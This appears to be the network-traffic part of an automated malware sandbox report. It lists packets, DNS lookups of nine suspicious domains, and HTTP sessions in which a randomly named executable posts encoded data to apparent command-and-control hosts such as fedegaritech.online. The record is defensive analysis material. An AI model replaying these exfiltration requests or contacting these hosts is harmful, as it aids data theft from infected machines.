                                                                                                      Nov 18, 2024 13:54:15.697554111 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:16.283394098 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:16.283499002 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:17.201472044 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:17.206448078 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:18.223975897 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:18.229052067 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:18.229151964 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:18.240345001 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:18.245315075 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559350014 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559485912 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559498072 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559509993 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559545040 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.559583902 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559588909 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.559597015 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559607983 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559709072 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.567527056 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567548990 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567565918 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567580938 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567598104 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567612886 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567629099 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567658901 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.567658901 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.567718983 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.677917957 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.677939892 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678011894 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678026915 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678041935 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678147078 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.678184986 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678189039 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.678229094 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685287952 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685345888 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685380936 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685416937 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685586929 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685604095 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685638905 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685750008 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685797930 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685934067 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685956001 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.686002970 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.797082901 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797118902 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797138929 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797271967 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.797278881 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797298908 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797341108 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804282904 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804358959 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804384947 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804404020 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804449081 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804553032 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804656982 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804702044 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804764032 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804780960 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804799080 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804825068 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.805146933 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.805193901 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.808963060 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.813920021 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.210052013 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:25.214952946 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.215122938 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:25.226416111 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:25.231333017 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.871208906 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.903923035 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.903981924 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:26.732758045 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.752516985 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.757549047 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:27.757616997 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.766491890 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.771816015 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:28.407143116 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:28.439155102 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:28.439248085 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:29.279623032 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.298693895 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.303890944 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:30.304002047 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.315171957 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.320193052 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:30.320445061 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:30.969628096 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:31.002310991 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:31.002382994 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:31.826455116 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.845870972 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.850856066 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:32.851633072 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.859011889 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.863826990 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:33.513044119 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:33.545675039 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:33.545769930 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:33.546823025 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:33.551585913 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:38.731853008 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:38.736762047 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:38.736831903 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:38.748069048 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:38.752963066 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:39.371241093 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:39.371398926 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:40.264024973 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:40.269069910 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.283164978 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:41.288084030 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.288183928 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:41.299343109 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:41.304337978 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.914705992 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.914813995 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:42.811424017 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:42.819204092 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:43.836333036 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:43.842813015 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:43.842900038 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:43.854106903 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:43.859076977 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:43.859910965 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:44.535989046 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:44.536201000 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:45.357868910 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:45.362792015 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:46.376383066 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:46.381597996 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:46.381738901 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:46.388480902 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:46.393426895 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:47.012469053 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:47.012995005 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:47.013061047 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:47.015194893 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:47.020198107 CET804999475.2.103.23192.168.2.5
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                      Nov 18, 2024 13:55:46.434787035 CET53638121.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 13:53:54.430866003 CET | 192.168.2.5 | 1.1.1.1 | 0x5eeb | Standard query (0) | www.habitat.rent | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:10.267066002 CET | 192.168.2.5 | 1.1.1.1 | 0x4b89 | Standard query (0) | www.fedegaritech.online | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:24.814647913 CET | 192.168.2.5 | 1.1.1.1 | 0xd21f | Standard query (0) | www.newegg.club | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:38.566199064 CET | 192.168.2.5 | 1.1.1.1 | 0x90a5 | Standard query (0) | www.urssaf.pro | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:52.032887936 CET | 192.168.2.5 | 1.1.1.1 | 0x186d | Standard query (0) | www.livelovechat.live | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:05.362225056 CET | 192.168.2.5 | 1.1.1.1 | 0xb432 | Standard query (0) | www.inspires.website | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:18.830041885 CET | 192.168.2.5 | 1.1.1.1 | 0xd0bc | Standard query (0) | www.tenmyk.shop | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:33.080331087 CET | 192.168.2.5 | 1.1.1.1 | 0xd550 | Standard query (0) | www.isirumah.info | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:46.393450975 CET | 192.168.2.5 | 1.1.1.1 | 0x1320 | Standard query (0) | www.ssrnoremt-rise.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 13:53:54.470120907 CET | 1.1.1.1 | 192.168.2.5 | 0x5eeb | No error (0) | www.habitat.rent | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:53:54.470120907 CET | 1.1.1.1 | 192.168.2.5 | 0x5eeb | No error (0) | www.habitat.rent | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:10.577837944 CET | 1.1.1.1 | 192.168.2.5 | 0x4b89 | No error (0) | www.fedegaritech.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:25.207626104 CET | 1.1.1.1 | 192.168.2.5 | 0xd21f | No error (0) | www.newegg.club | | 149.115.238.44 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:38.729506016 CET | 1.1.1.1 | 192.168.2.5 | 0x90a5 | No error (0) | www.urssaf.pro | | 75.2.103.23 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:52.046222925 CET | 1.1.1.1 | 192.168.2.5 | 0x186d | No error (0) | www.livelovechat.live | livelovechat.live | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:54:52.046222925 CET | 1.1.1.1 | 192.168.2.5 | 0x186d | No error (0) | livelovechat.live | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:54:52.046222925 CET | 1.1.1.1 | 192.168.2.5 | 0x186d | No error (0) | livelovechat.live | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:05.401372910 CET | 1.1.1.1 | 192.168.2.5 | 0xb432 | No error (0) | www.inspires.website | | 203.161.49.193 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:18.845366001 CET | 1.1.1.1 | 192.168.2.5 | 0xd0bc | No error (0) | www.tenmyk.shop | | 104.21.74.79 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:18.845366001 CET | 1.1.1.1 | 192.168.2.5 | 0xd0bc | No error (0) | www.tenmyk.shop | | 172.67.200.118 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:33.103272915 CET | 1.1.1.1 | 192.168.2.5 | 0xd550 | No error (0) | www.isirumah.info | | 15.197.204.56 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:33.103272915 CET | 1.1.1.1 | 192.168.2.5 | 0xd550 | No error (0) | www.isirumah.info | | 3.33.243.145 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:46.434787035 CET | 1.1.1.1 | 192.168.2.5 | 0x1320 | No error (0) | www.ssrnoremt-rise.sbs | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:55:46.434787035 CET | 1.1.1.1 | 192.168.2.5 | 0x1320 | No error (0) | www.ssrnoremt-rise.sbs | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
• www.habitat.rent
• www.fedegaritech.online
• www.newegg.club
• www.urssaf.pro
• www.livelovechat.live
• www.inspires.website
• www.tenmyk.shop
• www.isirumah.info
• www.ssrnoremt-rise.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49981 | 13.248.169.48 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:53:54.536928892 CET | 485 | OUT | GET /qamt/?3Vh=yvQMRWxE2iO5NiGttbyWAgCre54yjFUaAy+iSkz1i7eGywRcxpKEFNt/NGEMHOrlTtjc9BmVSmuvb6I2HEY7edCQWcNrZNkx1k+cySMijmBFLnX5HqbQY2Sgr5WEpsgKJA==&GLvL=i6ILStp HTTP/1.1
Host: www.habitat.rent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
Nov 18, 2024 13:53:55.193813086 CET | 404 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 18 Nov 2024 12:53:55 GMT
Content-Type: text/html
Content-Length: 264
Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 56 68 3d 79 76 51 4d 52 57 78 45 32 69 4f 35 4e 69 47 74 74 62 79 57 41 67 43 72 65 35 34 79 6a 46 55 61 41 79 2b 69 53 6b 7a 31 69 37 65 47 79 77 52 63 78 70 4b 45 46 4e 74 2f 4e 47 45 4d 48 4f 72 6c 54 74 6a 63 39 42 6d 56 53 6d 75 76 62 36 49 32 48 45 59 37 65 64 43 51 57 63 4e 72 5a 4e 6b 78 31 6b 2b 63 79 53 4d 69 6a 6d 42 46 4c 6e 58 35 48 71 62 51 59 32 53 67 72 35 57 45 70 73 67 4b 4a 41 3d 3d 26 47 4c 76 4c 3d 69 36 49 4c 53 74 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3Vh=yvQMRWxE2iO5NiGttbyWAgCre54yjFUaAy+iSkz1i7eGywRcxpKEFNt/NGEMHOrlTtjc9BmVSmuvb6I2HEY7edCQWcNrZNkx1k+cySMijmBFLnX5HqbQY2Sgr5WEpsgKJA==&GLvL=i6ILStp"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49983 | 208.91.197.27 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:54:10.600955009 CET | 761 | OUT | POST /sxrn/ HTTP/1.1
Host: www.fedegaritech.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Connection: close
Cache-Control: no-cache
Origin: http://www.fedegaritech.online
Referer: http://www.fedegaritech.online/sxrn/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 32 32 49 58 76 47 44 66 4c 2b 33 7a 6f 45 47 70 49 71 73 75 68 45 79 59 6e 74 65 7a 4e 47 49 76 6e 45 50 72 62 74 77 75 51 53 5a 42 6e 37 4f 36 7a 4f 38 65 47 37 62 59 41 38 6a 44 6b 2f 50 5a 62 62 59 72 74 73 75 45 7a 47 4a 66 39 67 78 4e 67 34 7a 2f 4d 38 33 4a 6c 50 56 78 33 53 44 4f 67 4a 35 42 51 78 6f 65 6f 61 46 35 55 63 65 4f 54 51 30 6f 6c 63 42 41 35 46 70 4c 35 63 53 49 61 70 39 53 36 35 37 2b 4c 6d 32 51 39 51 69 55 76 30 79 52 71 78 41 78 30 70 54 62 39 4b 49 50 6c 52 64 49 38 41 42 4b 72 37 43 70 36 53 61 77 4c 6d 67 45 72 79 75 31 65 73 6f 79 6e 77 46 6d 45 33 79 6d 4f 72 63 3d
                                                                                                      Data Ascii: 3Vh=22IXvGDfL+3zoEGpIqsuhEyYntezNGIvnEPrbtwuQSZBn7O6zO8eG7bYA8jDk/PZbbYrtsuEzGJf9gxNg4z/M83JlPVx3SDOgJ5BQxoeoaF5UceOTQ0olcBA5FpL5cSIap9S657+Lm2Q9QiUv0yRqxAx0pTb9KIPlRdI8ABKr7Cp6SawLmgEryu1esoynwFmE3ymOrc=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49984 | 208.91.197.27 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:54:13.140285015 CET | 781 | OUT | POST /sxrn/ HTTP/1.1
Host: www.fedegaritech.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
Connection: close
Cache-Control: no-cache
Origin: http://www.fedegaritech.online
Referer: http://www.fedegaritech.online/sxrn/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 32 32 49 58 76 47 44 66 4c 2b 33 7a 6f 6b 32 70 4b 49 45 75 30 55 79 62 37 39 65 7a 45 6d 4a 6f 6e 45 44 72 62 73 45 41 58 6b 78 42 6b 61 2b 36 68 66 38 65 46 37 62 59 59 4d 6a 38 36 50 50 48 62 62 63 6a 74 73 53 45 7a 46 31 66 39 67 68 4e 6a 50 48 77 4d 73 33 4c 6b 2f 56 76 6f 43 44 4f 67 4a 35 42 51 31 41 34 6f 61 74 35 55 73 4f 4f 53 30 59 6e 37 4d 41 79 77 6c 70 4c 79 38 53 79 61 70 39 77 36 34 33 48 4c 67 79 51 39 53 36 55 76 67 65 53 68 78 41 72 71 5a 53 6f 79 66 68 6d 39 78 4a 70 30 53 55 53 36 5a 4f 4e 32 45 72 61 52 45 6f 73 34 53 43 4e 4f 2f 67 46 32 41 6b 50 65 55 69 57 51 38 49 2f 59 61 46 69 66 51 70 49 48 73 2f 65 43 48 73 74 76 76 70 52
                                                                                                      Data Ascii: 3Vh=22IXvGDfL+3zok2pKIEu0Uyb79ezEmJonEDrbsEAXkxBka+6hf8eF7bYYMj86PPHbbcjtsSEzF1f9ghNjPHwMs3Lk/VvoCDOgJ5BQ1A4oat5UsOOS0Yn7MAywlpLy8Syap9w643HLgyQ9S6UvgeShxArqZSoyfhm9xJp0SUS6ZON2EraREos4SCNO/gF2AkPeUiWQ8I/YaFifQpIHs/eCHstvvpR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49985 | 208.91.197.27 | 80 | 1896 | C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:54:15.692220926 CET | 1798 | OUT | POST /sxrn/ HTTP/1.1
Host: www.fedegaritech.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1240
Connection: close
Cache-Control: no-cache
Origin: http://www.fedegaritech.online
Referer: http://www.fedegaritech.online/sxrn/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 32 32 49 58 76 47 44 66 4c 2b 33 7a 6f 6b 32 70 4b 49 45 75 30 55 79 62 37 39 65 7a 45 6d 4a 6f 6e 45 44 72 62 73 45 41 58 6b 35 42 6b 70 6d 36 7a 73 55 65 45 37 62 59 47 38 6a 39 36 50 4f 62 62 61 34 6e 74 73 66 37 7a 44 78 66 37 44 5a 4e 69 36 72 77 56 63 33 4c 68 50 56 79 33 53 44 66 67 4b 42 61 51 78 73 34 6f 61 74 35 55 71 4b 4f 43 51 30 6e 35 4d 42 41 35 46 70 58 35 63 54 64 61 70 6c 4b 36 34 6a 58 4d 52 4f 51 39 78 43 55 75 56 79 53 73 78 41 74 72 5a 53 77 79 66 6c 39 39 77 6c 62 30 54 67 34 36 61 75 4e 7a 69 79 47 4c 30 74 32 75 30 50 68 45 4e 63 31 76 41 73 75 58 30 61 4c 51 72 6f 38 65 50 39 6e 49 6b 64 56 54 49 43 56 65 54 6f 70 39 4c 34 53 37 42 6c 77 39 44 5a 69 6f 31 6f 43 79 35 69 4b 62 78 79 4d 68 58 6b 6e 4e 4a 6c 56 4f 53 71 69 68 43 46 56 48 59 63 32 56 57 50 6f 68 5a 61 49 74 39 49 51 63 6f 42 48 46 45 48 4d 77 36 66 49 42 5a 53 79 58 38 55 66 67 31 79 39 52 37 58 32 47 77 78 4f 5a 38 33 55 50 34 34 2b 31 6e 62 52 2b 43 7a 4a 41 51 54 47 70 2b 65 48 66 6e 30 2b 6e 31 [TRUNCATED]
